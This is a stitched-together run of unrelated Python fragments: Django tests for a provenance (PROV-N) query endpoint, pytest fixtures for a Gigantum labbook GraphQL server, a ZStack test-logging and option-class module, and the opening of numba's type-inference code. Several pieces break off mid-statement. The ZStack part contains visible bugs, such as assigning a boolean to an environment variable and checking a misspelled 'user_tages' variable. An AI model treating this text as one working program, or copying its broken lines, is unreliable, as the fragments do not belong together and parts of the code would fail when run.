entity(rave:dr4, [voprov:name="RAVE DR4"])
agent(org:rave, [voprov:name="RAVE project"])
wasAssociatedWith(rave:act, org:rave, -)
wasAttributedTo(rave:dr4, org:rave)
"""
self.assertEqual(expected, content)
def test_getProvdalAgentFollowW3C(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=org:rave&AGENT=TRUE&DEPTH=1&RESPONSEFORMAT=PROV-N&MODEL=W3C')
self.assertEqual(response.status_code, 200)
# agent, activity, entity, wat and was. relation should be returned
# strip begin/end document and prefix from response content:
content = get_content(response)
expected = \
"""activity(rave:act, -, -, [prov:label="myactivity"])
entity(rave:dr4, [prov:label="RAVE DR4"])
agent(org:rave, [prov:label="RAVE project"])
wasAssociatedWith(rave:act, org:rave, -)
wasAttributedTo(rave:dr4, org:rave)
"""
self.assertEqual(expected, content)
def test_getProvdalBack(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = re.sub(r'document.*\n', '', response.content)
content = re.sub(r'endDocument', '', content)
content = re.sub(r'prefix.*\n', '', content)
expected = \
"""activity(rave:act, -, -, [voprov:name="myactivity"])
activityFlow(rave:flow, -, -, [voprov:name="myflow"])
entity(rave:obs, [voprov:name="RAVE observations"])
agent(org:rave, [voprov:name="RAVE project"])
used(rave:act, rave:obs, -)
wasAssociatedWith(rave:act, org:rave, -)
hadStep(rave:flow, rave:act)
"""
self.assertEqual(content, expected)
def test_getProvdalForth(self):
client = Client()
response = client.get(reverse('prov_vo:provdal')+'?ID=rave:act&DEPTH=1&DIRECTION=FORTH&RESPONSEFORMAT=PROV-N')
self.assertEqual(response.status_code, 200)
content = re.sub(r'document.*\n', '', response.content)
content = re.sub(r'endDocument', '', content)
content = re.sub(r'prefix.*\n', '', content)
expected = \
"""activity(rave:act, -, -, | |
<gh_stars>10-100
from typing import Tuple
import pytest
import tempfile
import os
import uuid
import shutil
import graphene
from flask import Flask
import flask
import time
import redis
import responses
from graphene.test import Client
from gtmcore.files import FileOperations
from gtmcore.container.local_container import get_docker_client
from gtmcore.environment import RepositoryManager
from gtmcore.configuration.configuration import Configuration, deep_update
from gtmcore.auth.identity import get_identity_manager_class
from gtmcore.environment.bundledapp import BundledAppManager
from gtmcore.inventory.inventory import InventoryManager
from lmsrvcore.middleware import DataloaderMiddleware, error_middleware, RepositoryCacheMiddleware
from lmsrvcore.caching import DatasetCacheController
from lmsrvcore.tests.fixtures import insert_cached_identity
from gtmcore.fixtures import (ENV_UNIT_TEST_REPO, ENV_UNIT_TEST_REV, ENV_UNIT_TEST_BASE)
from gtmcore.container import container_for_context
from gtmcore.environment import ComponentManager
from gtmcore.imagebuilder import ImageBuilder
from lmsrvlabbook.api.query import LabbookQuery
from lmsrvlabbook.api.mutation import LabbookMutations
from gtmcore.fixtures.datasets import helper_append_file
from gtmcore.fixtures.fixtures import _create_temp_work_dir
from gtmcore.dataset.cache import get_cache_manager_class
from gtmcore.dataset import Manifest
import gtmcore
@pytest.fixture(scope='session')
def mock_enable_unmanaged_for_testing():
"""A pytest fixture that enables unmanaged datasets for testing. Until unmanaged datasets are completed, they
are disabled and dormant. We want to keep testing them and carry the code forward, but don't want them to be
used yet.
When running via a normal build, only "gigantum_object_v1" is available. To enable the others, you need to edit
gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS in gtmcore.dataset.storage.__init__.py
When this is done (unmanaged datasets are being re-activated) you should remove this fixture everywhere.
"""
gtmcore.dataset.storage.SUPPORTED_STORAGE_BACKENDS = {
"gigantum_object_v1": ("gtmcore.dataset.storage.gigantum", "GigantumObjectStore"),
"local_filesystem": ("gtmcore.dataset.storage.local", "LocalFilesystem"),
"public_s3_bucket": ("gtmcore.dataset.storage.s3", "PublicS3Bucket")}
yield
class EnvironMock(object):
"""A simple class to mock the Flask environ object so you can have a token"""
def __init__(self):
self.environ = {'HTTP_AUTHORIZATION': "Bearer afaketoken"}
class ContextMock(object):
"""A simple class to mock the Flask request context so you have a labbook_loader attribute"""
def __init__(self):
self.labbook_loader = None
self.headers = EnvironMock()
@pytest.fixture
def fixture_working_dir():
"""A pytest fixture that creates a temporary working directory, config file, schema, and local user identity
"""
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly(this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
context_value=ContextMock())
# name of the config file, temporary working directory (for the current server), the schema
yield config_instance, temp_dir, client, schema
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture
def fixture_working_dir_dataset_tests(fixture_working_dir, mock_enable_unmanaged_for_testing):
"""A pytest fixture to enable all dataset types for testing only. This can be removed and should be replaced in all
test functions with `fixture_working_dir` once unmanaged datasets are truely enabled.
"""
yield fixture_working_dir
@pytest.fixture
def fixture_working_dir_lfs_disabled():
"""A pytest fixture that creates a temporary working directory, config file, schema, and local user identity
"""
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir(lfs_enabled=False)
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly(this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
context_value=ContextMock())
yield config_instance, temp_dir, client, schema
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_env_repo_scoped():
"""A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
and populates the environment component repository.
Class scope modifier attached
"""
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# get environment data and index
erm = RepositoryManager()
erm.update_repositories()
erm.index_repositories()
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), error_middleware, RepositoryCacheMiddleware()],
context_value=ContextMock())
# name of the config file, temporary working directory (for current server), the schema
yield config_instance, temp_dir, client, schema
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_populated_scoped():
"""A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
and populates the environment component repository.
Class scope modifier attached
"""
# Flush here to clean out the Repository cache (used to store create/modify dates).
redis.Redis(db=7).flushdb()
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# Create a bunch of lab books
im = InventoryManager()
im.create_labbook('default', 'default', "labbook1", description="Cats labbook 1")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook2", description="Dogs labbook 2")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook3", description="Mice labbook 3")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook4", description="Horses labbook 4")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook5", description="Cheese labbook 5")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook6", description="Goat labbook 6")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook7", description="Turtle labbook 7")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook8", description="Lamb labbook 8")
time.sleep(1.1)
im.create_labbook('default', 'default', "labbook9", description="Taco labbook 9")
time.sleep(1.1)
im.create_labbook('test3', 'test3', "labbook-0", description="This should not show up.")
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
context_value=ContextMock())
yield config_instance, temp_dir, client, schema
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture(scope="class")
def fixture_working_dir_dataset_populated_scoped():
"""A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
and populates the environment component repository.
Class scope modifier attached
"""
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# Create a bunch of lab books
im = InventoryManager()
im.create_dataset('default', 'default', "dataset2", storage_type="gigantum_object_v1", description="Cats 2")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset3", storage_type="gigantum_object_v1", description="Cats 3")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset4", storage_type="gigantum_object_v1", description="Cats 4")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset5", storage_type="gigantum_object_v1", description="Cats 5")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset6", storage_type="gigantum_object_v1", description="Cats 6")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset7", storage_type="gigantum_object_v1", description="Cats 7")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset8", storage_type="gigantum_object_v1", description="Cats 8")
time.sleep(1.1)
im.create_dataset('default', 'default', "dataset9", storage_type="gigantum_object_v1", description="Cats 9")
time.sleep(1.1)
im.create_dataset('default', 'test3', "dataset-other", storage_type="gigantum_object_v1", description="Cats other")
time.sleep(1.1)
im.create_labbook('test3', 'test3', "labbook-0", description="This should not show up.")
im.create_dataset('default', 'default', "dataset1", storage_type="gigantum_object_v1", description="Cats 1")
time.sleep(1.1)
# Flush Redis cache for Repo info
DatasetCacheController().clear_all()
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()],
context_value=ContextMock())
yield config_instance, temp_dir, client, schema
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture
def fixture_single_dataset():
"""A pytest fixture that creates a temporary working directory, a config file to match, creates the schema,
and populates the environment component repository.
Class scope modifier attached
"""
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# Create a bunch of lab books
im = InventoryManager()
ds = im.create_dataset('default', 'default', "test-dataset", storage_type="gigantum_object_v1", description="Cats 2")
m = Manifest(ds, 'default')
cm_class = get_cache_manager_class(ds.client_config)
cache_mgr = cm_class(ds, 'default')
revision = ds.git.repo.head.commit.hexsha
os.makedirs(os.path.join(cache_mgr.cache_root, revision, "other_dir"))
helper_append_file(cache_mgr.cache_root, revision, "test1.txt", "asdfasdf")
helper_append_file(cache_mgr.cache_root, revision, "test2.txt", "rtg")
helper_append_file(cache_mgr.cache_root, revision, "test3.txt", "wer")
helper_append_file(cache_mgr.cache_root, revision, "other_dir/test4.txt", "dfasdfhfgjhg")
helper_append_file(cache_mgr.cache_root, revision, "other_dir/test5.txt", "fdghdfgsa")
m.update()
# Load User identity into app context
app = Flask("lmsrvlabbook")
app.config["LABMGR_CONFIG"] = config = Configuration()
app.config["ID_MGR_CLS"] = get_identity_manager_class(config)
with app.app_context():
# within this block, current_app points to app. Set current user explicitly (this is done in the middleware)
flask.g.user_obj = get_identity_manager_class(config)(config).get_user_profile()
flask.g.access_token = "<PASSWORD>"
flask.g.id_token = "<PASSWORD>"
# Create a test client
client = Client(schema, middleware=[DataloaderMiddleware(), RepositoryCacheMiddleware()], context_value=ContextMock())
yield config_instance, temp_dir, client, ds, cache_mgr
# Remove the temp_dir
config_instance.clear_cached_configuration()
shutil.rmtree(temp_dir)
@pytest.fixture(scope='class')
def build_image_for_jupyterlab():
# Create temp dir
config_instance, temp_dir = _create_temp_work_dir()
# Create user identity
insert_cached_identity(config_instance.app_workdir)
# Create test client
schema = graphene.Schema(query=LabbookQuery, mutation=LabbookMutations)
# get environment data and index
erm = RepositoryManager()
erm.update_repositories()
erm.index_repositories()
# Load User identity into app context
app = | |
'''
@author: Frank
'''
import os
import time
import string
import sys
import traceback
import string
import zstacklib.utils.xmlobject as xmlobject
import apibinding.inventory as inventory
import zstackwoodpecker.action_select as action_select
minus_split = '-'*10 + '\n'
action_break = '\n' + '-'*10 + '\n'
log_prefix = ' <Log>'
action_prefix = '\n <<Action>>'
dsc_prefix = '\n ##'
warn_prefix = '\n !!WARN!!'
class TestError(Exception):
'''zstack test exception'''
def raise_exeception_no_cleanup(msg):
os.environ['WOODPECKER_NO_ERROR_CLEANUP'] = True
raise TestError(msg)
def write_to_action_log(msg):
case_action_log = os.environ.get('WOODPECKER_CASE_ACTION_LOG_PATH')
if not case_action_log:
return False
#raise TestError('CASE_ACTION_LOG_PATH is not set in environment variable.')
try:
fd = open(case_action_log, 'a+')
fd.write(msg + '\n')
except Exception as e:
raise e
fd.close()
#Record test warning
def test_warn(msg):
print_msg = '[CASE WARN]:\n%s %s \n%s' % (minus_split, msg, minus_split)
print print_msg
log_time = time.ctime().split()[3]
action_msg = '%s %s [%s]\n' % (warn_prefix, msg, log_time)
action_msg = '%s %s [%s]' % (warn_prefix, msg, log_time)
only_action_log = os.environ.get('WOODPECKER_ONLY_ACTION_LOG')
if not only_action_log:
write_to_action_log(action_msg)
#Record Test Log
def test_logger(msg):
log_time = time.ctime().split()[3]
print_msg = '[CASE LOG]: %s\n%s %s \n%s' % (log_time, minus_split, msg, minus_split)
print print_msg
action_msg = '%s %s [%s]\n' % (log_prefix, msg, log_time)
action_msg = '%s %s [%s]' % (log_prefix, msg, log_time)
only_action_log = os.environ.get('WOODPECKER_ONLY_ACTION_LOG')
if not only_action_log:
write_to_action_log(action_msg)
#Record Test Result
def test_result(msg):
print_msg = '[CASE RESULT]:\n%s %s \n%s' % (minus_split, msg, minus_split)
print print_msg
log_time = time.ctime().split()[3]
action_msg = '%s<Result> %s [%s]' % (action_break, msg, log_time)
write_to_action_log(action_msg)
def test_fail(msg, no_cleanup = False):
'''
No test case codes will be executed, after calling this function.
'''
test_logger(msg)
test_result("Failed :(")
if no_cleanup:
os.environ['WOODPECKER_NO_ERROR_CLEANUP'] = True
raise TestError(msg)
def test_pass(msg):
'''
No test case codes will be executed, after calling this function.
'''
test_logger(msg)
test_result("Pass :)")
sys.exit(0)
def test_skip(msg):
'''
No test case codes will be executed, after calling this function.
'''
test_logger(msg)
test_result("Skipped")
sys.exit(2)
#Record Action Log
def action_logger(msg):
print_msg = '[ACTION LOG]:\n%s %s \n%s' % (minus_split, msg, minus_split)
print print_msg
log_time = time.ctime().split()[3]
action_msg = '%s %s [%s]\n' % (action_prefix, msg, log_time)
write_to_action_log(action_msg)
#Test description
def test_dsc(msg):
print_msg = '[Test DSC]:\n%s %s \n%s' % (minus_split, msg, minus_split)
print print_msg
action_msg = '%s %s\n' % (dsc_prefix, msg)
write_to_action_log(action_msg)
class TestConfig(object):
def __init__(self, config_path):
self.config_path = config_path
if not config_path:
raise TestError('Test config file (test-config.xml) path is not set')
self.config_base_path = os.path.dirname(os.path.abspath(config_path))
self.deploy_config_template_path = None
def _full_path(self, path):
if path.startswith('~'):
return os.path.expanduser(path)
elif path.startswith('/'):
return path
else:
return os.path.join(self.config_base_path, path)
def get_test_config(self):
cfg_path = os.path.abspath(self.config_path)
with open(cfg_path, 'r') as fd:
xmlstr = fd.read()
fd.close()
config = xmlobject.loads(xmlstr)
return config
def get_deploy_config(self):
config = self.get_test_config()
deploy_config_template_path = config.get('deployConfigTemplate')
if deploy_config_template_path:
deploy_config_template_path = self._full_path(deploy_config_template_path)
if not os.path.exists(deploy_config_template_path):
raise TestError('unable to find %s' % deploy_config_template_path)
self.deploy_config_template_path = deploy_config_template_path
else:
raise TestError('not define test deploy config xml file by <deployConfigTemplate> in: %s' % self.config_path)
deploy_config_path = self._full_path(config.deployConfig.text_)
if not os.path.exists(deploy_config_path):
raise TestError('unable to find %s' % deploy_config_path)
if deploy_config_template_path:
deploy_config = build_deploy_xmlobject_from_configure(deploy_config_path, deploy_config_template_path)
deploy_config.put_attr('deployConfigTemplatePath', deploy_config_template_path)
else:
deploy_config = build_deploy_xmlobject_from_configure(deploy_config_path)
deploy_config.put_attr('deployConfigPath', deploy_config_path)
return deploy_config
def expose_config_variable(self):
if self.deploy_config_template_path:
set_env_var_from_config_template(self.deploy_config_template_path)
class DataOption(object):
def __init__(self):
self.session_uuid = None
self.timeout = 300000 #5 mins
self.name = None
self.description = None
def set_session_uuid(self, session_uuid):
self.session_uuid = session_uuid
def get_session_uuid(self):
return self.session_uuid
def set_name(self, name):
self.name = name
def get_name(self):
return self.name
def set_description(self, description):
self.description = description
def get_description(self):
return self.description
def set_timeout(self, timeout):
self.timeout = timeout
def get_timeout(self):
return self.timeout
class ClusterOption(DataOption):
def __init__(self):
self.hypervisor_type = None
self.type = 'zstack'
super(ClusterOption, self).__init__()
def set_hypervisor_type(self, hypervisor_type):
self.hypervisor_type = hypervisor_type
def get_hypervisor_type(self):
return self.hypervisor_type
def set_type(self, type):
self.type = type
def get_type(self):
return self.type
class IpRangeOption(DataOption):
def __init__(self):
self.l3_uuid = None
self.startIp = None
self.endIp = None
self.gateway = None
self.netmask = None
super(IpRangeOption, self).__init__()
def set_l3_uuid(self, l3_uuid):
self.l3_uuid = l3_uuid
def get_l3_uuid(self):
return self.l3_uuid
def set_startIp(self, startIp):
self.startIp = startIp
def get_startIp(self):
return self.startIp
def set_endIp(self, endIp):
self.endIp = endIp
def get_endIp(self):
return self.endIp
def set_gateway(self, gateway):
self.gateway = gateway
def get_gateway(self):
return self.gateway
def set_netmask(self, netmask):
self.netmask = netmask
def get_netmask(self):
return self.netmask
class VipOption(DataOption):
def __init__(self):
self.l3_uuid = None
self.allocateStrategy = None
super(VipOption, self).__init__()
def set_l3_uuid(self, l3_uuid):
self.l3_uuid = l3_uuid
def get_l3_uuid(self):
return self.l3_uuid
def set_allocateStrategy(self, strategy):
self.allocateStrategy = strategy
def get_allocateStrategy(self):
return self.allocateStrategy
class PrimaryStorageOption(DataOption):
def __init__(self):
self.type = None
self.url = None
self.zone_uuid = None
super(PrimaryStorageOption, self).__init__()
def set_type(self, type):
self.type = type
def get_type(self):
return self.type
def set_zone_uuid(self, zone_uuid):
self.zone_uuid = zone_uuid
def get_zone_uuid(self):
return self.zone_uuid
def set_url(self, url):
self.url = url
def get_url(self):
return self.url
class CephPrimaryStorageOption(PrimaryStorageOption):
def __init__(self):
self.monUrls = None
self.dataVolumePoolName = None
self.rootVolumePoolName = None
self.imageCachePoolName = None
super(CephPrimaryStorageOption, self).__init__()
self.type = inventory.CEPH_PRIMARY_STORAGE_TYPE
def set_monUrls(self, monUrls):
self.monUrls = monUrls
def get_monUrls(self):
return self.monUrls
def set_imageCachePoolName(self, imageCachePoolName):
self.imageCachePoolName = imageCachePoolName
def get_imageCachePoolName(self):
return self.imageCachePoolName
def set_dataVolumePoolName(self, dataVolumePoolName):
self.dataVolumePoolName = dataVolumePoolName
def get_dataVolumePoolName(self):
return self.dataVolumePoolName
def set_rootVolumePoolName(self, rootVolumePoolName):
self.rootVolumePoolName = rootVolumePoolName
def get_rootVolumePoolName(self):
return self.rootVolumePoolName
class DiskOfferingOption(DataOption):
def __init__(self):
self.diskSize = None
self.allocatorStrategy = None
self.type = None
super(DiskOfferingOption, self).__init__()
def set_diskSize(self, diskSize):
self.diskSize = diskSize
def get_diskSize(self):
return self.diskSize
def set_allocatorStrategy(self, allocatorStrategy):
self.allocatorStrategy = allocatorStrategy
def get_allocatorStrategy(self):
return self.allocatorStrategy
def set_type(self, type):
self.type = type
def get_type(self):
return self.type
class InstanceOfferingOption(DataOption):
def __init__(self):
self.cpuNum = None
self.cpuSpeed = None
self.memorySize = None
self.allocatorStrategy = None
self.type = None
super(InstanceOfferingOption, self).__init__()
def set_cpuNum(self, cpuNum):
self.cpuNum = cpuNum
def get_cpuNum(self):
return self.cpuNum
def set_cpuSpeed(self, cpuSpeed):
self.cpuSpeed = cpuSpeed
def get_cpuSpeed(self):
return self.cpuSpeed
def set_memorySize(self, memorySize):
self.memorySize = memorySize
def get_memorySize(self):
return self.memorySize
def set_allocatorStrategy(self, allocatorStrategy):
self.allocatorStrategy = allocatorStrategy
def get_allocatorStrategy(self):
return self.allocatorStrategy
def set_type(self, type):
self.type = type
def get_type(self):
return self.type
class VmOption(DataOption):
def __init__(self, vm_opt = None):
if not vm_opt:
self.l3_uuids = None
self.image_uuid = None
self.instance_offering_uuid = None
self.vm_type = None
self.host_uuid = None
self.cluster_uuid = None
self.zone_uuid = None
self.data_disk_uuids = None
self.default_l3_uuid = None
self.root_disk_uuid = None
#system tag is an array
self.system_tags = None
self.user_tags = None
super(VmOption, self).__init__()
else:
self.l3_uuids = vm_opt.get_l3_uuids()
self.image_uuid = vm_opt.get_image_uuid()
self.instance_offering_uuid = vm_opt.get_instance_offering_uuid()
self.vm_type = vm_opt.get_vm_type()
self.host_uuid = vm_opt.get_host_uuid()
self.cluster_uuid = vm_opt.get_cluster_uuid()
self.zone_uuid = vm_opt.get_zone_uuid()
self.data_disk_uuids = vm_opt.get_data_disk_uuids()
self.root_disk_uuid = None
self.set_name(vm_opt.get_name())
self.set_description(vm_opt.get_description())
self.set_timeout(vm_opt.get_timeout())
self.default_l3_uuid = vm_opt.get_default_l3_uuid()
self.system_tags = vm_opt.get_system_tags()
self.user_tags = vm_opt.get_user_tags()
super(VmOption, self).__init__()
def set_l3_uuids(self, l3_uuids):
if not isinstance(l3_uuids, list):
raise TestError('l3_uuids is not a list.')
self.l3_uuids = l3_uuids
def get_l3_uuids(self):
return self.l3_uuids
def set_system_tags(self, system_tags):
if not system_tags:
self.system_tags = []
return
if not isinstance(system_tags, list):
raise TestError('system_tags is not a list.')
self.system_tags = system_tags
def get_system_tags(self):
return self.system_tags
def set_user_tags(self, user_tags):
if not user_tages:
self.user_tags = []
return
if not isinstance(user_tags, list):
raise TestError('user_tags is not a list.')
self.user_tags = user_tags
def get_user_tags(self):
return self.user_tags
def set_default_l3_uuid(self, l3_uuid):
self.default_l3_uuid = l3_uuid
def get_default_l3_uuid(self):
return self.default_l3_uuid
def set_root_disk_uuid(self, disk_uuid):
self.root_disk_uuid = disk_uuid
def get_root_disk_uuid(self):
return self.root_disk_uuid
def set_zone_uuid(self, zone_uuid):
self.zone_uuid = zone_uuid
def get_zone_uuid(self):
return self.zone_uuid
def set_image_uuid(self, image_uuid):
self.image_uuid = image_uuid
def get_image_uuid(self):
return self.image_uuid
def set_cluster_uuid(self, cluster_uuid):
self.cluster_uuid = cluster_uuid
def get_cluster_uuid(self):
return self.cluster_uuid
def set_host_uuid(self, host_uuid):
self.host_uuid = host_uuid
def get_host_uuid(self):
return self.host_uuid
def set_instance_offering_uuid(self, instance_offering_uuid):
self.instance_offering_uuid = instance_offering_uuid
def get_instance_offering_uuid(self):
return self.instance_offering_uuid
def set_vm_type(self, vm_type):
self.vm_type = vm_type
def get_vm_type(self):
return self.vm_type
def set_data_disk_uuids(self, data_disk_uuids):
self.data_disk_uuids = data_disk_uuids
def get_data_disk_uuids(self):
return self.data_disk_uuids
class VolumeOption(DataOption):
def __init__(self):
self.disk_offering_uuid = None #used when create volume from template
self.url = None #used when add volume from url.
self.volume_type = None #used when add volume from url
self.backup_storage_uuid_list = [] #used when add volume from url
super(VolumeOption, self).__init__()
def set_disk_offering_uuid(self, disk_offering_uuid):
self.disk_offering_uuid = disk_offering_uuid
def get_disk_offering_uuid(self):
return self.disk_offering_uuid
def set_backup_storage_uuid_list(self, backup_storage_uuid_list):
self.backup_storage_uuid_list = backup_storage_uuid_list
def get_backup_storage_uuid_list(self):
return self.backup_storage_uuid_list
def set_url(self, url):
self.url = url
def get_url(self):
return self.url
def set_volume_type(self, volume_type):
self.volume_type = volume_type
def get_volume_type(self):
return self.volume_type
class ImageOption(DataOption):
def __init__(self):
self.root_volume_uuid = None #for create template from root volume
self.backup_storage_uuid_list = [] #
self.guest_os_type = None #CentOS7
self.platform = None #Linux, Windows, Unknown
self.bits = None #64/32
self.url = None #http:// for add a new image
self.mediaType = None #Template, ISO
self.format = None #qcow/raw for KVM, simulator,
self.system = None #used for system image
super(ImageOption, self).__init__()
def set_root_volume_uuid(self, root_volume_uuid):
self.root_volume_uuid = root_volume_uuid
def get_root_volume_uuid(self):
return self.root_volume_uuid
def set_backup_storage_uuid_list(self, backup_storage_uuid_list):
self.backup_storage_uuid_list = backup_storage_uuid_list
def get_backup_storage_uuid_list(self):
return self.backup_storage_uuid_list
def set_guest_os_type(self, guest_os_type):
self.guest_os_type = guest_os_type
| |
<filename>numba/typeinfer.py
"""
Type inference base on CPA.
The algorithm guarantees monotonic growth of type-sets for each variable.
Steps:
1. seed initial types
2. build constrains
3. propagate constrains
4. unify types
Constrain propagation is precise and does not regret (no backtracing).
Constrains push types forward following the dataflow.
"""
from __future__ import print_function, division, absolute_import
from pprint import pprint
import itertools
from numba import ir, types, utils, config, six
from numba.config import PYVERSION
from numba.utils import builtins
RANGE_ITER_OBJECTS = (builtins.range,)
if PYVERSION < (3, 0):
RANGE_ITER_OBJECTS += (builtins.xrange,)
class TypingError(Exception):
def __init__(self, msg, loc=None):
self.msg = msg
self.loc = loc
if loc:
super(TypingError, self).__init__("%s\n%s" % (msg, loc.strformat()))
else:
super(TypingError, self).__init__("%s" % (msg,))
class TypeVar(object):
def __init__(self, context, var):
self.context = context
self.var = var
self.typeset = set()
self.locked = False
def add_types(self, *types):
if not types:
return
# Sentry for None
for ty in types:
if ty is None:
raise TypeError("Using None as variable type")
nbefore = len(self.typeset)
if self.locked:
if set(types) != self.typeset:
[expect] = list(self.typeset)
for ty in types:
if self.context.type_compatibility(ty, expect) is None:
raise TypingError("No conversion from %s to %s for "
"'%s'" % (ty, expect, self.var))
else:
self.typeset |= set(types)
nafter = len(self.typeset)
assert nbefore <= nafter, "Must grow monotonically"
def lock(self, typ):
if self.locked:
[expect] = list(self.typeset)
if self.context.type_compatibility(typ, expect) is None:
raise TypingError("No conversion from %s to %s for "
"'%s'" % (typ, expect, self.var))
else:
self.typeset = set([typ])
self.locked = True
def union(self, other):
self.add_types(*other.typeset)
def __repr__(self):
return '%s := {%s}' % (self.var, ', '.join(map(str, self.typeset)))
def get(self):
return tuple(self.typeset)
def getone(self):
assert len(self) == 1, self.typeset
return tuple(self.typeset)[0]
def __len__(self):
return len(self.typeset)
class ConstrainNetwork(object):
"""
TODO: It is possible to optimize constrain propagation to consider only
dirty type variables.
"""
def __init__(self):
self.constrains = []
def append(self, constrain):
self.constrains.append(constrain)
def propagate(self, context, typevars):
for constrain in self.constrains:
try:
constrain(context, typevars)
except TypingError:
raise
except Exception as e:
msg = "Internal error at {con}:\n{err}"
raise TypingError(msg.format(con=constrain, err=e),
loc=constrain.loc)
class Propagate(object):
"""
A simple constrain for direct propagation of types for assignments.
"""
def __init__(self, dst, src, loc):
self.dst = dst
self.src = src
self.loc = loc
def __call__(self, context, typevars):
typevars[self.dst].union(typevars[self.src])
class BuildTupleConstrain(object):
def __init__(self, target, items, loc):
self.target = target
self.items = items
self.loc = loc
def __call__(self, context, typevars):
tsets = [typevars[i.name].get() for i in self.items]
oset = typevars[self.target]
for vals in itertools.product(*tsets):
if all(vals[0] == v for v in vals):
tup = types.UniTuple(dtype=vals[0], count=len(vals))
else:
tup = types.Tuple(vals)
oset.add_types(tup)
class ExhaustIterConstrain(object):
def __init__(self, target, count, iterator, loc):
self.target = target
self.count = count
self.iterator = iterator
self.loc = loc
def __call__(self, context, typevars):
oset = typevars[self.target]
for tp in typevars[self.iterator.name].get():
if isinstance(tp, types.IterableType):
oset.add_types(types.UniTuple(dtype=tp.iterator_type.yield_type,
count=self.count))
elif isinstance(tp, types.Tuple):
oset.add_types(tp)
class PairFirstConstrain(object):
def __init__(self, target, pair, loc):
self.target = target
self.pair = pair
self.loc = loc
def __call__(self, context, typevars):
